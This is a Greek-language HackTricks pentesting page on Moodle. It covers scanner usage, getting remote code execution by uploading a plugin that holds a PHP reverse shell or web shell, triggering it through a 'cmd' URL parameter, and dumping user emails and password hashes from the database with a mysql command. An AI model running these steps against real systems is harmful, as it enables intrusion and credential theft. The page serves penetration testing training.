hacktricks/network-services-pentesting/pentesting-web/moodle.md

8.1 KiB
Raw Blame History

Moodle

Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το htARTE (Ειδικός Red Team του HackTricks AWS)!

Άλλοι τρόποι υποστήριξης του HackTricks:

Συμβουλή για αμοιβή ευρημάτων: Εγγραφείτε στο Intigriti, μια πρεμιέρα πλατφόρμα αμοιβής ευρημάτων δημιουργημένη από χάκερς, για χάκερς! Γίνετε μέλος μας στο https://go.intigriti.com/hacktricks σήμερα και αρχίστε να κερδίζετε αμοιβές έως και $100,000!

{% embed url="https://go.intigriti.com/hacktricks" %}

Αυτόματες Σάρωσεις

droopescan

pip3 install droopescan
droopescan scan moodle -u http://moodle.example.com/<moodle_path>/

[+] Plugins found:
forum http://moodle.schooled.htb/moodle/mod/forum/
http://moodle.schooled.htb/moodle/mod/forum/upgrade.txt
http://moodle.schooled.htb/moodle/mod/forum/version.php

[+] No themes found.

[+] Possible version(s):
3.10.0-beta

[+] Possible interesting urls found:
Static readme file. - http://moodle.schooled.htb/moodle/README.txt
Admin panel - http://moodle.schooled.htb/moodle/login/

[+] Scan finished (0:00:05.643539 elapsed)

moodlescan

moodlescan

#Install from https://github.com/inc0d3/moodlescan
python3 moodlescan.py -k -u http://moodle.example.com/<moodle_path>/

Version 0.7 - Dic/2020
.............................................................................................................

By Victor Herrera - supported by www.incode.cl

.............................................................................................................

Getting server information http://moodle.schooled.htb/moodle/ ...

server         	: Apache/2.4.46 (FreeBSD) PHP/7.4.15
x-powered-by   	: PHP/7.4.15
x-frame-options	: sameorigin
last-modified  	: Wed, 07 Apr 2021 21:33:41 GMT

Getting moodle version...

Version found via /admin/tool/lp/tests/behat/course_competencies.feature : Moodle v3.9.0-beta

Searching vulnerabilities...


Vulnerabilities found: 0

Scan completed.

CMSMap

CMSMap

pip3 install git+https://github.com/dionach/CMSmap.git
cmsmap http://moodle.example.com/<moodle_path>

CVEs

Ανακάλυψα ότι τα αυτόματα εργαλεία είναι αρκετά άχρηστα στον εντοπισμό ευπαθειών που επηρεάζουν την έκδοση moodle. Μπορείτε να τις ελέγξετε στο https://snyk.io/vuln/composer:moodle%2Fmoodle

RCE

Χρειάζεστε ρόλο manager και μπορείτε να εγκαταστήσετε πρόσθετα μέσα στην καρτέλα "Διαχείριση Ιστότοπου"**:**

Αν είστε manager, ενδέχεται να χρειαστεί να ενεργοποιήσετε αυτήν την επιλογή. Μπορείτε να δείτε πώς στο PoC εκμετάλλευσης προνομίων του moodle: https://github.com/HoangKien1020/CVE-2020-14321.

Στη συνέχεια, μπορείτε να εγκαταστήσετε το ακόλουθο πρόσθετο που περιέχει τον κλασικό php rev shell (πριν το ανεβάσετε, πρέπει να το αποσυμπιέσετε, να αλλάξετε τη διεύθυνση IP και τη θύρα του revshell και να το συμπιέσετε ξανά)

{% file src="../../.gitbook/assets/moodle-rce-plugin.zip" %}

Ή μπορείτε να χρησιμοποιήσετε το πρόσθετο από https://github.com/HoangKien1020/Moodle_RCE για να λάβετε ένα κανονικό PHP shell με την παράμετρο "cmd".

Για να αποκτήσετε πρόσβαση και να εκκινήσετε το κακόβουλο πρόσθετο, πρέπει να αποκτήσετε πρόσβαση στο:

http://domain.com/<moodle_path>/blocks/rce/lang/en/block_rce.php?cmd=id

POST

Εύρεση διαπιστευτηρίων βάσης δεδομένων

find / -name "config.php" 2>/dev/null | grep "moodle/config.php"

Απορρόφηση διαπιστευτήριων από βάση δεδομένων

/usr/local/bin/mysql -u <username> --password=<password> -e "use moodle; select email,username,password from mdl_user; exit"

Συμβουλή για bug bounty: Εγγραφείτε στο Intigriti, μια προηγμένη πλατφόρμα bug bounty δημιουργημένη από χάκερς, για χάκερς! Γίνετε μέλος στο https://go.intigriti.com/hacktricks σήμερα και αρχίστε να κερδίζετε αμοιβές έως και $100,000!

{% embed url="https://go.intigriti.com/hacktricks" %}

Μάθετε το hacking στο AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι υποστήριξης του HackTricks: